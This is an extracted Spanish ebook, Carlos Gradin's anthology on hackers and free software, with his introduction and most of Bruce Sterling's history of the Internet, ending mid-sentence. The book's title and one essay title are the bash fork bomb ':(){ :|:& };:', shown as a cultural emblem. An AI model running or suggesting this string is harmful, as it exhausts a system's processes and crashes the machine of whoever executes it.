internet, hackers y software li varios

928

Upload: httpspodemoslondreswordpresscomtagteresa-rodriguez

Post on 24-Jul-2015

172 views

Category:

Internet


5 download

TRANSCRIPT

Page 1: Internet, hackers y software li   varios
Page 2: Internet, hackers y software li   varios

En internet, hackers y software librese le ha dado la palabra a loshackers. Son ellos quienes aportandiversas miradas sobre el uso de lastecnologías informáticas en lostiempos que corren. Combatiendola mirada descalificada queconfunde al hacker con el cracker opirata informático, los hackersdefienden modos alternativos deprogramación, muchas veces bajoredes de cooperación horizontal ybajo preceptos éticos que setransmiten de generación engeneración.

Page 3: Internet, hackers y software li   varios

Carlos Gradin

Internet,hackers y

software libreePUB v1.4

lestrobe 14.07.12

Page 4: Internet, hackers y software li   varios
Page 5: Internet, hackers y software li   varios

Titulo original: :(){ :|:& };:Compilador: Carlos Gradin:(){ :|:& };: fue publicado originalmenteen 2004.Editorial: editoral fantasma

Short history of Internet. Traducción deAntonio MontesinosFreedom or copyright?. Traducción dePablo Rodríguez. Publicado en la revistaTechnology Review en 2000.Science must 'push copyright aside'.Traducción de Carlos Gradin. Publicadoen la revista científica Nature en 2001.Can you trust your computer?.Traducción de Javier Smaldone.A Cypherpunk’s manifesto. Traducciónde Carlos Gradin.Old hackers, new hackers: What’ s thedifference?. Traducción de Carlos Gradin.

Page 6: Internet, hackers y software li   varios

Hacker’ s culture(s). Traducción deCarlos Gradin.Neruda’ s sea birds. Traducción deCarlos Gradin.:(){ :|:& };:. Traducción de Carlos Gradin.Cyberpunks in the nineties. Traducciónde Carlos Gradin.Is it OK to be a luddite?. Traducción deCarlos Gradin.Why the future doesn’t need us.Traducción de Carlos Gradin.

Editor original: Lestrobe (v1.0 a v1.4)ePub base v2.0

Page 7: Internet, hackers y software li   varios

PRESENTACIÓNLa figura del «hacker» suele

aparecer en las noticias y las películasligada a usos ilegales de la tecnología.Pueden ser adolescentes irresponsableso enemigos decididos del orden público,más o menos organizados, pero siemprefactores de peligro que disparan lanecesidad de reforzar los controles ysancionar leyes que adapten los viejoscódigos penales a las nuevas realidadesde las computadoras. Un chico curiosodesde su cuarto en Caballito, BuenosAires, puede quebrar las leyes de variospaíses y movilizar a sus policías. Un

Page 8: Internet, hackers y software li   varios

filipino puede escribir un virus que sepropague atravesando fronteras ycontinentes. Los hackers son el objeto dediscursos sobre seguridad en las redes,que abarcan desde la preocupación delas agencias de policías y de las grandesempresas, a la perplejidad de losexpertos en leyes que deben crearnuevos artilugios legales paraclasificarlos, y la espectacularidad conla que irrumpen en las crónicas de losnoticieros como personajes de ciertosub-mundo criminal. Así vistos, loshackers participan de las nuevastecnologías en un nivel similar al deotros fenómenos que obstaculizan el

Page 9: Internet, hackers y software li   varios

flujo de los negocios por las redes oechan mantos de sospecha moral sobreellas; si el «correo basura» satura lascasillas de los usuarios y hace perderhoras de valioso tiempo, y si el negociode la pornografía infantil o los mercadosde tráfico ilegal se montan en elanonimato que permiten losintercambios de mails en Internet, loshackers son otra zona de inseguridad queobliga a reforzar los controles ymantener activo el estado de sospecha.

Pero los hackers no se ven a símismos como delincuentes, y de hechoya se hacían llamar «hackers» cuando lamayoría no se había enterado todavía de

Page 10: Internet, hackers y software li   varios

qué era exactamente una computadora.Dejando de lado el estereotipo, ¿por quéson interesantes los hackers? El tema deeste libro no son los hackers como tales,sino su mirada respecto a aquello quehacen. Para los primeros que empezarona llamarse «hackers» entre sí, en el MIT(Instituto de Tecnología deMassachusetts) en .UU lo que hacían losdiferenciaba radicalmente de los demástécnicos y profesores. Éstos cumplíanhorarios, se ajustaban a la burocracia einvestigaban sobre computadoras segúnsus aplicaciones en estadística y otroscampos específicos. Los hackersempezaron a experimentar en usos más

Page 11: Internet, hackers y software li   varios

terrenales, programas que tocabanmúsica, procesadores de texto, juegosde ajedrez. Esas primeras creacionesfueron el comienzo de una larga serie deaportes y proyectos que tuvieron comoprotagonistas a estos grupos deentusiastas (desde las computadoraspersonales a la arquitectura de Internet,pasando por la criptografía y la idea delcódigo abierto que derivó en el actualauge de Linux). Como lo relata Levy ensu libro «Hackers», ya entoncespromovían formas de trabajo quecontemplaban una dimensión colectivade la tecnología: facilitar el acceso detodos y compartir el conocimiento.

Page 12: Internet, hackers y software li   varios

El software libre es una concepcióncolectiva de la propiedad. Todos losque escriben el código de un programason dueños de él; y todas las personaspueden escribir y cambiar el código siquieren, y saben cómo hacerlo. Esto eslo que opone a los sistemas operativosWindows y Linux: modelo abierto yparticipativo de Linux, contra el deWindows, cerrado, orientado a lamaximización de ganancias. Es una ideapresente entre los hackers desde loscomienzos de la informática. El escritorNeal Stephenson lo describe así:«Windows 95 y MacOS son productos,concebidos por ingenieros al servicio de

Page 13: Internet, hackers y software li   varios

compañías particulares. Unix,[1] encambio, es menos un producto que laesmerada recopilación de la historiaoral de la subcultura hacker. Es nuestraepopeya de Gilgamesh. Y sigue:

«Lo que hacía tanpoderosas y duraderas a las viejasepopeyas como la de Gilgameshera el hecho de que consistieranen cuerpos de narrativas vivientesque muchas personas conocían dememoria, y relataban una y otravez haciendo sus retoquespersonales cada vez que lesparecía. Los malos retoques se

Page 14: Internet, hackers y software li   varios

descartaban, los buenos eranrecogidos por otros, se pulían,mejoraban y, con el tiempo, eranincorporados a la historia. Delmismo modo, Unix es conocido,amado y comprendido por tantoshackers que puede ser reescritodesde cero en cuanto alguien lonecesite. Esto es muy difícil deentender para las personasacostumbradas a pensar que lossistemas operativos son cosas quenecesariamente hay quecomprar».

de En el principio fue… lalínea de comando de Neal

Page 15: Internet, hackers y software li   varios

Stephenson[2].

Un punto de partida para situar opensar el papel de los hackers, podríaser este entusiasmo por lo que hacen, elorgullo por sus obras y la valoración delas personas según sus conocimientos ydestrezas, que se refleja en las palabrasdel hacker y ensayista Eric Raymond,

La cultura hacker no tiene líderes,pero tiene héroes culturales, ancianosde la tribu, historiadores yportavoces. De donde se desprendetambién el sentido de horizontalidad a lahora de participar y hacer aportes, quetodos señalan como rasgo característico.

Page 16: Internet, hackers y software li   varios

Cuando un grupo de hackers a finesde los ‘70 desarrolló técnicas decriptografía avanzada que habíancopiado del Ejército de EE.UU y diseñóprogramas que garantizan la privacidadde las comunicaciones por Internet, elgobierno de EE.UU puso esosprogramas en la lista de productos conrestricciones para la exportación.Sacarlos del país según estas leyesimplica un delito del mismo calibre queel tráfico de armas nucleares. Ladifusión vía Internet de estos programasde criptografía, gratis y con códigoabierto, logró que se convirtieran en unstandard de seguridad en todo el mundo.

Page 17: Internet, hackers y software li   varios

Este sería otro rasgo a tener encuenta, el de la iniciativa personal, laautogestión de proyectos que partiendode necesidades personales o locales,luego terminan beneficiando a lasociedad en general. Paradigma de estoes el caso de Linus Torvalds, el hackerfinlandés que en 1991 empezó aprogramar un sistema operativo tipoUnix para usar en la PC-386 que tenía ensu casa; un proyecto que con el tiempose convertiría en Linux, el sistemaoperativo de distribución gratuita quehoy usan millones de personas.

También se llaman a sí mismos«hackers» personas que se especializan

Page 18: Internet, hackers y software li   varios

en violar la protección de computadorasy redes privadas. Son los que suelenaparecer en las noticias y representadosen algunas películas, como la famosaJuegos de Guerra. En este caso se losasocia con adolescentes que se diviertencon el riesgo y el desafío que implicameterseen sistemas de empresas ogobiernos. En el libro LlanerosSolitarios,Fernando Bonsembiante narralas historias de varios hackersargentinos que a mediados de los ´80aprendieron a aprovechar las fallas deseguridad de las redes locales, para usarel acceso a Internet con el que contabanalgunas empresas antes de que Internet

Page 19: Internet, hackers y software li   varios

se popularizara.Así, muchos de ellos pudieron

acceder a foros de chat instalados ensistemas «hackeados» y frecuentadospor hackers de otras partes del mundo.En 1994 la revista «Virus Report»dirigida por Fernando Bonsembiante,organizó un congreso de hackers en elCentro Cultural Recoleta, en BuenosAires, al que asistieron hackers famososcomo el neoyorquino EmmanuelGoldstein, editor de una revistalegendaria entre los hackers, la 2600.Por su parte, los programadores deLinux y los impulsores del SoftwareLibre tienden a negar que aquellos sean

Page 20: Internet, hackers y software li   varios

verdaderos hackers y los asocian condelincuentes, llamándolos «crackers».

El filósofo finlandés Pekka Himanenescribió en La ética de los hackers y elespíritu de la era de la informaciónhaciendo a un lado a estos crackers,como primer paso, un análisis de lasmotivaciones y modos de entender eltrabajo en la «cultura hacker», a la queconsidera un quiebre respecto a lacultura del trabajo heredera de la éticaprotestante[3].

Contra las ideas de sacrificio y debúsqueda permanente de maximizaciónde ganancias, la ética de los hackerspropone la pasión, la libertad para

Page 21: Internet, hackers y software li   varios

organizar el tiempo y el trabajo, metasque no toman el dinero como fin en símismo, sino que se orientan a lacooperación y el interés social. ManuelCastells les atribuye un rol fundamentalen el desarrollo de Internet y de lo queél llama la sociedad red, dada suinfluencia desde los orígenes de laarquitectura y el estilo de organizaciónabierto y horizontal de las redes decomputadoras.

Un modo de entender la actividad delos hackers sería a partir de lo queproducen con sus creaciones o suspaseos furtivos por las redes, en tantopuntos de vistas respecto a sus

Page 22: Internet, hackers y software li   varios

herramientas las computadoras. Todo unmundo queda expuesto cuando a ungrupo de hackers se les ocurre crearprogramas y repartirlos para que losusen todos los que quieran, o cuandodiseñan sistemas de criptografíaavanzada para usuarios comunes, eincluso cuando ponen en evidencia lamala seguridad de los programas y lasredes que utilizan las empresas y losgobiernos.

Se cuestionan las leyes de copyright,se pone en duda la privacidad de lascomunicaciones, y se abre una disputasobre el control y la función de policíadel Estado respecto a los usuarios de las

Page 23: Internet, hackers y software li   varios

redes. Pero sobre todo se deja ver unmodo de vincularse a las tecnologíaspor el interés directo, por la pasión deconocer, aprender y compartir con otroslo aprendido. En definitiva, por amor ala profesión (o al arte). Entonces, sihubiera que responder a la pregunta depor qué son interesantes los hackers, larespuesta tentativa sería porqueproducen visiones y propuestascreativas y apasionantes sobre latecnología, ya sea que lo hagan porquese lo proponen, o porque surgen comoresultado de su presencia, por loscuestionamientos e interrogantes queésta plantea.

Page 24: Internet, hackers y software li   varios

Esta antología de textos pretende darun panorama que sirva de introducción avarios temas vinculados a los hackers ysus actividades en distintas áreas.Arranca con una sección de «Historia»con dos textos de Eric Raymond y elescritor Bruce Sterling sobre la historiade Internet y la cultura hacker. En«Software Libre» se incluyen un artículode Miquel Vidal que es unaintroducción, a la vez que balancecrítico, del software libre, junto con unaselección de notas y artículos deRichard Stallman, el impulsor de lapatente GNU y la Fundación SoftwareLibre, en los que debate sobre la

Page 25: Internet, hackers y software li   varios

importancia de volver a pensar lasregulaciones de copyright en función delas nuevas tecnologías y sobre laposibilidad que brindan las redes decompartir la información (ya seanprogramas, música o literatura).

En la sección «Criptografía» seincluyen dos intervenciones (unmanifiesto y una ponencia en uncongreso) de Eric Hughes y JohnGilmore, que son dos de los hackers másdestacados del grupo Cypherpunks(«Cripto-hackers»), un grupoestadounidense dedicado a programar ydifundir al gran público métodos deencriptación de datos para hacer más

Page 26: Internet, hackers y software li   varios

seguras las comunicaciones. En«Hackers» se presentan dos artículos deSteve Mizrach y Jonas Löwgren, queanalizan las distintas ideas que suelenasociarse a los hackers, y lasdiscusiones entre hackers«constructivos» y hackers que violan laseguridad de los sistemas. También seincluyen aquí dos textos del hackeritaliano jaromil en los que se explaya alrespecto. Queda por hablar de lassecciones «Activismo» y«Tecnologías».

Éstas no hacen referencia explícita alos hackers y sus actividades, pero losincluimos los textos porque creemos que

Page 27: Internet, hackers y software li   varios

sirven para completar el panoramaabierto por las demás secciones. En lasección «Activismo» un artículo deMiquel Vidal y otro escrito por MarilinaWinik del grupo Indymedia Argentina,se refieren a las posibilidades que abreInternet para garantizar la librecirculación de información que noencuentra espacios en los mediostradicionales. La sección «Tecnologías»recopila notas que desde distintasperspectivas y disciplinas reflexionansobre las relaciones entre los hombres,las tecnologías que desarrollan y lo quepiensan e imaginan sobre ellas. Aquí seincluyen textos de escritores como

Page 28: Internet, hackers y software li   varios

Thomas Pynchon y Bruce Sterling, delsociólogo argentino Christian Ferrer ydel ingeniero informático Bill Joy.

Carlos Gradin

Page 29: Internet, hackers y software li   varios

HISTORIA

Page 30: Internet, hackers y software li   varios

Breve Historia deInternet por Bruce

Sterling

Bruce Sterling escribió novelas ycuentos de ciencia ficción, y libros ycolumnas sobre temas vinculados a latecnología. Junto a William Gibson fueuna de las figuras más destacadas de lacorriente cyberpunk que renovó elgénero ciencia ficción a comienzos delos '80. Entre sus obras puedenmencionarse Islas en la Red (198 8),The Difference Engine (1990, encolaboración con Gibson),Mirrorshades: una antología ciberpunk

Page 31: Internet, hackers y software li   varios

(1992) y The Hacker Crackdown(1990), una investigación sobre lacacería de hackers lanzada por el FBI en1989. Nació en 1954 y vive en Texas,Estados Unidos.

Este artículo sobre la historia yarquitectura de Internet salió publicadoen febrero de 1993, en la revista inglesaThe magazine of fantasy and sciencefiction.

Hace unos treinta años, la RANDCorporation, la principal fábrica deideas de la América de la guerra fría, seenfrentó a un extraño problemaestratégico. ¿Cómo se podríancomunicar con éxito las autoridadesnorteamericanas tras una guerra nuclear?

Page 32: Internet, hackers y software li   varios

La América postnuclear necesitaríauna red de comando y control enlazadade ciudad a ciudad, estado a estado,base a base. Pero sin importar cómo esared estuviera de protegida, sus líneas yequipos siempre serían vulnerables alimpacto de bombas atómicas. Un ataquenuclear reduciría cualquier redimaginable a pedazos.

¿Cómo sería controlada esa red?Cualquier autoridad central, cualquiernúcleo de red centralizado sería unobjetivo obvio e inmediato para un misilenemigo. El centro de la red sería elprimer lugar a derribar.

La RAND le dio muchas vueltas a

Page 33: Internet, hackers y software li   varios

este difícil asunto en secreto militar yllegó a una solución atrevida. Lapropuesta de la RAND (ideada por unode sus miembros, Paul Baran) se hizopública en 1964. En primer lugar, la redno tendría autoridad central. Además,sería diseñada desde el principio paraoperar incluso hecha pedazos.

Los principios eran simples. Seasumiría que una red era poco fiable encualquier momento. Se diseñaría paratrascender su propia falta de eficacia.Todos los nodos en la red serían igualesentre sí, cada nodo con autoridad paracrear, pasar y recibir mensajes. Losmensajes se dividirían en paquetes, cada

Page 34: Internet, hackers y software li   varios

paquete dirigido por separado. Cadapaquete saldría de un nodo fuenteespecífico y terminaría en un nododestino. Cada paquete recorrería la redsegún unos principios particulares.

La ruta que tome cada paquete notendría importancia. Solo contarían losresultados finales. Básicamente, elpaquete sería lanzado como una patatade un nodo a otro, más o menos endirección a su destino, hasta acabar enel lugar adecuado. Si grandes porcionesde la red fueran destruidas esosimplemente no importaría; los paquetespermanecerían en la red en los nodosque hubieran sobrevivido. Este sistema

Page 35: Internet, hackers y software li   varios

de envío tan arbitrario podría parecerineficiente en el sentido usual deltérmino (especialmente comparado con,por ejemplo, el sistema telefónico).

Durante los ‘60, este intriganteconcepto de red de conmutación depaquetes descentralizada y a prueba debombas caminó sin rumbo entre elRAND, el MIT [MassachusettsInstitute of Technology] y la UCLA[University of California in LosAngeles]. El National PhysicalLaboratory [Laboratorio Nacional deFísica] de Gran Bretaña preparó laprimera red de prueba basada en estosprincipios en 1968. Poco después, la

Page 36: Internet, hackers y software li   varios

Agencia de Proyectos de InvestigaciónAvanzada del Pentágono [ARPA,Advanced Research Projects Agency]decidió financiar un proyecto másambicioso y de mayor envergadura enlos Estados Unidos. Los nodos de a rediban a ser superordenadores de altavelocidad (o lo que se llamara así enaquel momento). Eran máquinas pocousuales y de mucho valor y que estabannecesitadas de un buen entramado de redpara proyectos nacionales deinvestigación y desarrollo.

En el otoño [boreal] de 1969 elprimero de esos nodos fue instalado enUCLA. En diciembre de ese año había

Page 37: Internet, hackers y software li   varios

cuatro nodos en la pequeña red, que sellamó ARPANET después de que fuerapromocionada por el Pentágono. Loscuatro ordenadores podían transferirinformación sobre líneas dedicadas dealta velocidad. Incluso podían serprogramados remotamente desde otrosnodos. Gracias a ARPANET, científicose investigadores podían compartir lasfacilidades de otros ordenadores en ladistancia. Era un servicio muy útil yaque el tiempo de proceso de losordenadores en los ‘70 era algo muycodiciado. En 1971 había quince nodosen ARPANET; en 1972, treinta y siete.Todo iba perfecto.

Page 38: Internet, hackers y software li   varios

En su segundo año de operatividad,sin embargo, algo extraño se hizopatente. Los usuarios de ARPANEThabían convertido la red en una oficinade correos electrónica de alta velocidadsubvencionada federalmente. La mayorparte del tráfico de ARPANET no era elproceso dedatos a largas distancias. Envez de eso, lo que se movía por allí erannoticias y mensajes personales. Losinvestigadores estaban usandoARPANET para colaborar en proyectos,intercambiar notas sobre sus trabajos y,eventualmente, chismorrear. La gentetenía sus propias cuentas personales enlos ordenadores de ARPANET y sus

Page 39: Internet, hackers y software li   varios

direcciones personales de correoelectrónico. No es que sólo utilizaranARPANET para la comunicación depersona a persona, pero había muchoentusiasmo por esta posibilidad muchomás que por la computación a largadistancia.

Eso no pasó mucho antes del inventode las listas de distribución, una técnicade emisión de información porARPANET mediante la cual un mismomensaje se podía enviarautomáticamente a una gran cantidad desubscriptores. Es interesante que una delas primeras listas de distribuciónmasivas se llamara SF-LOVERS

Page 40: Internet, hackers y software li   varios

[Amantes de la Ciencia Ficción].Discutir sobre ciencia ficción en la redno tenía nada que ver con el trabajo yeso enfadaba a muchos administradoresde sistema de ARPANET, pero eso noimpediría que la cosa siguiera.

Durante los ‘70, ARPANET creció.Su estructura descentralizada facilitó laexpansión. Contrariamente a las redesstandard de las empresas, la red deARPA se podía acomodar a diferentestipos de ordenador. En tanto y en cuantouna máquina individual pudiese hablarel lenguaje de conmutación de paquetesde la nueva y anárquica red, su marca,contenidos e incluso su propietario eran

Page 41: Internet, hackers y software li   varios

irrelevantes.El estándar de comunicaciones de

ARPA era conocido como NCP,Network Control Protocol , pero segúnpasaba el tiempo y la técnica avanzaba,el NCP fue superado por un estándar demás alto nivel y más sofisticadoconocido como TCP/IP. El TCP oTransmission Control Protocol ,convierte los mensajes en un caudal depaquetes en el ordenador fuente y losreordena en el ordenador destino. El IP,o Internet Protocol, maneja lasdirecciones comprobando que lospaquetes caminan por múltiples nodos eincluso por múltiples redes con

Page 42: Internet, hackers y software li   varios

múltiples standards no sólo ARPA fuepionera en el standard NCP, sinotambién Ethernet, FDDI y X.25.

En 1977, TCP/IP se usaba en otrasredes para conectarse a ARPANET.ARPANET estuvo controlada muyestrictamente hasta al menos 1983,cuando su parte militar se desmembró deella formando la red MILNET. Pero elTCP/IP las unía a todas. Y ARPANET,aunque iba creciendo, se convirtió en uncada vez más pequeño barrio en mediode la vasta galaxia de otras máquinasconectadas.

Según avanzaban los ‘70 y ‘80,distintos grupos sociales se encontraban

Page 43: Internet, hackers y software li   varios

en posesión de potentes ordenadores.Era muy fácil conectar esas máquinas ala creciente red de redes. Conforme eluso del TCP/IP se hacía más común,redes enteras caían abrazadas yadheridas a Internet. Siendo el softwarellamado TCP/IP de dominio público y latecnología básica descentralizada yanárquica por propia naturaleza, era muydifícil parar a la gente e impedir que seconectara. De hecho, nadie queríaimpedir a nadie la conexión a estacompleja ramificación de redes quellegó a conocerse como Internet.

Conectarse a Internet costaba alcontribuyente muy poco o nada desde

Page 44: Internet, hackers y software li   varios

que cada nodo era independiente y teníaque arreglárselas con la financiación ylos requerimientos técnicos. Cuantosmás, mejor. Como la red telefónica, lared de ordenadores era cada vez másvaliosa según abarcaba grandesextensiones de terreno, gente y recursos.

Un fax solo es útil si alguien mástiene un fax. Mientras tanto no es másque una curiosidad. ARPANET,también, fue una curiosidad durante untiempo. Después la red de ordenadoresse convirtió en una necesidadimportante.

En 1984 la Fundación Nacional parala Ciencia [National Science

Page 45: Internet, hackers y software li   varios

Foundation, NSF] entró en escena através de su Oficina de ComputaciónCientífica Avanzada [Office ofAdvanced Scientific Computing]. Lanueva NSFNET supuso un paso muyimportante en los avances técnicosconectando nuevas, más rápidas ypotentes supercomputadoras a través deenlaces más amplios, rápidos,actualizados y expandidos segúnpasaban los años, 1986, 1988 y 1990.Otras agencias gubernamentales tambiénse unieron: NASA, los InstitutosNacionales de la Salud, el Departamentode Energía, cada uno manteniendo ciertopoderío digital en la confederación

Page 46: Internet, hackers y software li   varios

Internet.Los nodos de esta creciente red de

redes se dividían en subdivisionesbásicas. Los ordenadores extranjeros yunos pocos americanos eligieron serdenominados según su localizacióngeográfica. Los otros fueron agrupadosen los seis dominios básicos de Internet:gov, mil, edu, com, org y net (estasabreviaturas tan sosas pertenecen alestándar de los protocolos TCP/IP).Gov, Mil y Edu definen al gobierno,militares e instituciones educativas, lascuales fueron, por supuesto, pioneras dela ARPANET que comenzó como unexperimento de alta tecnología en

Page 47: Internet, hackers y software li   varios

seguridad nacional. Com, sin embargo,definía a instituciones comerciales, queenseguida entraron a la red como torosde rodeo rodeadas por una nube deentusiastas organizaciones sin ánimo delucro (los ordenadores tipo net servíancomo pasarelas entre redes).

La red ARPANET propiamentedicha expiró en 1989 como víctima felizde su éxito abrumador. Sus usuariosapenas se dieron cuenta, pero lasfunciones de ARPANET no solocontinuaron sino que mejoraronfirmemente. El uso del estándar TCP/IPpara redes es ahora algo global. En1971, hace 21 años, sólo había cuatro

Page 48: Internet, hackers y software li   varios

nodos en la ARPANET. Hoy existendecenas de miles en Internet esparcidospor cuarenta y dos países y muchos másque se conectan cada día. Tres millonesde personas, posiblemente cuatro, usanesta gigantesca madre-de-todas-las-redes.

Internet es especialmente popularentre los científicos y es probablementesu instrumento más importante de finalesdel siglo XX. Las posibilidades deacceso tan potentes y sofisticadas queofrece a datos específicos y a lacomunicación personal ha elevado lamarcha de la investigación científicaenormemente.

Page 49: Internet, hackers y software li   varios

El índice de crecimiento de Interneta comienzo de los ‘90 es espectacular,casi feroz. Se extiende más rápidamenteque los teléfonos móviles y que el fax.El año pasado [1991] Internet crecía aun ritmo del 20% mensual. El número deordenadores con conexión directa alTCP/IP se ha estado doblandoanualmente desde 1988. Internet se estádesplazando de su origen militar ycientífico a las escuelas de enseñanzabásica e institutos, al mismo tiempo quea bibliotecas públicas y el sectorcomercial.

¿Por qué la gente quiere estar en lainternet? Una de las principales razones

Page 50: Internet, hackers y software li   varios

es simplemente la libertad. Internet es unraro ejemplo de anarquía verdadera,moderna y funcional. No existe InternetS.A No hay censores oficiales, ni jefes,ni junta directiva, ni accionistas. Enprincipio, cualquier nodo puede hablarde igual a igual a otros nodos siempreque obedezcan las leyes del protocoloTCP/IP, leyes que no son políticas sinoestrictamente técnicas. (Ha existidocontroversia sobre el uso comercial deInternet, pero esta situación estácambiando según los negociosproporcionan sus propios enlaces yconexiones.)

Internet también es una ganga.

Page 51: Internet, hackers y software li   varios

Internet en conjunto, a diferencia delsistema telefónico, no cuesta dinerosegún las distancias. Y a diferenciatambién de la mayoría de las redescomerciales, no se cobra por tiempo deconexión. De hecho, Internet de por sí,que ni siquiera existe como una entidad,no cobra nada por nada. Cada grupo degente que accede a Internet esresponsable de su propia máquina y desu propio trozo de línea.

L a anarquía de Internet puedeparecer extraña o incluso poco natural,pero tiene cierta profundidad y sentido.Es como la anarquía del idioma inglés.Nadie alquila el inglés y nadie lo posee.

Page 52: Internet, hackers y software li   varios

Como angloparlante, depende de tiaprender hablar inglés correctamente yusarlo para lo que quieras (aunque elgobierno proporciona fondos paraayudarte a que aprendas a leer y escribiralgo). Aunque mucha gente se gana lavida usando, explotando y enseñandoinglés, el Inglés como institución es unapropiedad pública, un bien común.Mucho de eso ocurre con Internet.¿Mejoraría el inglés si Idioma InglésS.A tuviera un consejo de administracióncon su director o ejecutivo al frente, unpresidente y una asamblea?Probablemente existirían muchas menospalabras en el idioma inglés, y muchas

Page 53: Internet, hackers y software li   varios

menos nuevas ideas.La gente en Internet siente que se

trata de una institución que se resiste ala institucionalización. El interéspertenece a todos y a nadie.

A pesar de esto, hay quién tieneintereses en Internet. Los negociantesquieren que Internet tenga una basefinanciera. Los gobernantes la quierenmás regulada. Los académicos laquieren para fines de investigación. Losmilitares para la seguridad. Y asímuchos más.

Todas estas fuentes de conflictopermanecen en torpe equilibrio, eInternet, hasta ahora, se mantiene en

Page 54: Internet, hackers y software li   varios

próspera anarquía. Antes, las líneas dealta velocidad de la NSFnet eranconocidas como la Espina dorsal deInternet [Internet Backbone], y suspropietarios podían señorearse con elresto de Internet; pero hoy existenespinas dorsales en Canadá, Japón yEuropa, e incluso algunas privadas parael tráfico comercial. Hoy, inclusoordenadores domésticos privadospueden convertirse en nodos de Internet.Se pueden llevar bajo el brazo. Pronto,quizás, en la muñeca.

Pero ¿qué es lo que uno hace conInternet? Básicamente, cuatro cosas:correspondencia, grupos de discusión,

Page 55: Internet, hackers y software li   varios

computación a larga distancia ytransferencia de archivos.

El correo de Internet es el correoelectrónico [e-mail], mucho más rápidoque el correo postal norteamericano, quees llamado despectivamente por losusuarios de Internet como correocaracol [snail mail]. El correo enInternet es algo como el fax. Es textoelectrónico, y no tienes que pagar por él(al menos directamente) y es a escalaglobal. Por correo electrónico se puedemandar software y algunos tipos deimágenes comprimidas. Se estátrabajando en nuevas formas de correoelectrónico.

Page 56: Internet, hackers y software li   varios

Los grupos de discusión, onewsgroups, son un mundo aparte. Estemundo de debate y argumentaciones seconoce como USENET. USENET es dehecho diferente a Internet. USENET escomo una multitud ondulante de gentechismosa y con ganas de informaciónque se mueve por Internet en busca debarbacoas de patio trasero. USENET noes tanto una red física como un conjuntode convenciones. En cualquier caso,ahora existen 2.500 grupos de discusiónseparados en USENET y sus mensajesgeneran unos 7 millones de palabras aldía. Naturalmente se habla mucho sobreordenadores en USENET, pero la

Page 57: Internet, hackers y software li   varios

variedad de temas sobre los que sehabla es enorme, creciendo estoscontinuamente. En USENET sedistribuyen varias publicacioneselectrónicas gratuitas de maneraperiódica.

Estos grupos y el correo electrónicoestán disponibles fácilmente, inclusofuera del corazón de Internet. Se puedeacceder a ellos a través de las líneas deteléfono normales, desde otras redescomo BITnet, UUCP y Fidonet. Losúltimos servicios de Internet,computación a larga distancia ytransferencia de archivos, requieren deconexión directa usando TCP/IP.

Page 58: Internet, hackers y software li   varios

La computación a larga distancia fuealgo pensado para ARPANET y aún seusa mucho, al menos por algunos. Losprogramadores pueden mantener suscuentas abiertas en poderosos super-ordenadores y ejecutar allí susprogramas o crear otros nuevos. Loscientíficos pueden usar potentesordenadores desde otros continentes.Las bibliotecas ofrecen sus catálogoselectrónicos para que se busque en ellosgratuitamente. Enormes catálogos enCD-ROM están disponibles a través deeste servicio. Y existe mucho softwaregratuito al mismo tiempo.

La transferencia de ficheros permite

Page 59: Internet, hackers y software li   varios

a los usuarios acceder a máquinasremotas y tomar de ellas programas otextos. Muchos ordenadores de Internet—unos dos mil o más— permiten que seacceda a ellos de manera anónima y quela gente use sus archivos de maneragratuita. Esto no es algo trivial, ya quelibros enteros se pueden transferir encuestión de minutos. Hoy, en 1992,existen más de un millón de ficherospúblicos disponibles a quién los quierautilizar (y otros millones disponibles agente con autorización). La transferenciade ficheros por Internet se estáconvirtiendo en una nueva forma depublicación, en la que el lector copia

Page 60: Internet, hackers y software li   varios

electrónicamente el texto que desee en lacantidad que quiera y de forma gratuita.Nuevos programas de Internet, comoarchie, gopher y WAIS se handesarrollado para catalogar y exploraresa cantidad de material.

Esta Internet sin cabeza, anárquica ycon millones de tentáculos se estáextendiendo como el pan de molde.Cada ordenador con la potenciasuficiente es una espora potencial deInternet y hoy los ordenadores se vendena menos de 2.000 dólares y estándisponibles en todo el mundo. La redARPA, diseñada para asegurar elcontrol de una sociedad desolada

Page 61: Internet, hackers y software li   varios

después de un holocausto nuclear, hasido sobrepasada por su hija mutante,Internet, que está a fuera de control aconciencia y se expandeexponencialmente por la aldea global dela post guerra fría. La expansión deInternet en los ‘90 se parece a la quesufrió la informática personal en los ‘70,aunque es más rápida y más importante.Más importante, quizás, porque da a losordenadores personales una imagen dealgo barato, de fácil acceso y conposibilidades de almacenaje a unaescala realmente planetaria.

El futuro de Internet pasa por sermás grande y con velocidades

Page 62: Internet, hackers y software li   varios

exponencialmente mayores. Lacomercialización de Internet es un temacandente hoy día, donde se prometecualquier tipo de comercializaciónsalvaje de la información. El gobiernofederal, agradecido por este éxitoinesperado, aún tiene mucho que deciren esto. La NREN, National Researchand Educational Network [Red Nacionalde Educación e Investigación], fueaprobada en el otoño de 1991 como unproyecto a cinco años y con unpresupuesto de dos mil millones dedólares para que la red troncal deInternet fuera actualizada. NREN seráunas 50 veces más rápida que la red más

Page 63: Internet, hackers y software li   varios

rápida de hoy día permitiendo latransferencia de la EnciclopediaBritánica en un segundo. Las redes deordenadores permitirán gráficosanimados en 3-D, enlaces de radio yteléfonos móviles a ordenadoresportátiles, fax, voz y televisión de altadefinición. ¡Un circo global multimedia!

O al menos así se espera —y seplanea. La Internet real del futuro debesoportar pocos parecidos con los planesde hoy. Prever las cosas nunca ha tenidomucho que ver con el rápido desarrollode Internet. Después de todo, Internet separece muy poco a aquellos sombríosplanes del RAND para el post-

Page 64: Internet, hackers y software li   varios

holocausto. Esto resulta una sutil y felizironía.

¿Cómo se accede a Internet? Bien, sino se tiene un ordenador con módem,hay que hacerse de uno. El ordenadorpuede actuar como una terminal y sepuede usar una línea de teléfonosordinaria para conectarse a una máquinaenganchada a Internet. Simplemente estopuede hacer que se tenga acceso a losgrupos de discusión y a una dirección decorreo electrónico propia. Merece lapena tener estos servicios aunque sólocon el correo y las noticias no se estádel todo en Internet.

Si está usted en un campus, la

Page 65: Internet, hackers y software li   varios

universidad puede que tenga accesodirecto a líneas TCP/IP de Internet dealta velocidad. Hágase con una cuentade Internet en un ordenador del campus yserá capaz de utilizar los servicios decomputación remota y la transferenciade archivos. Algunas ciudades comoCleveland proporcionan acceso gratuitoa la red. Las empresas tienen cada vezmás posibilidades de acceso y estándeseando vender esos accesos a susclientes. La cuota estándar es de unos 40dólares al mes —más o menos como elservicio de TV por cable.

Según avancen los noventas,encontrar acceso a Internet será mucho

Page 66: Internet, hackers y software li   varios

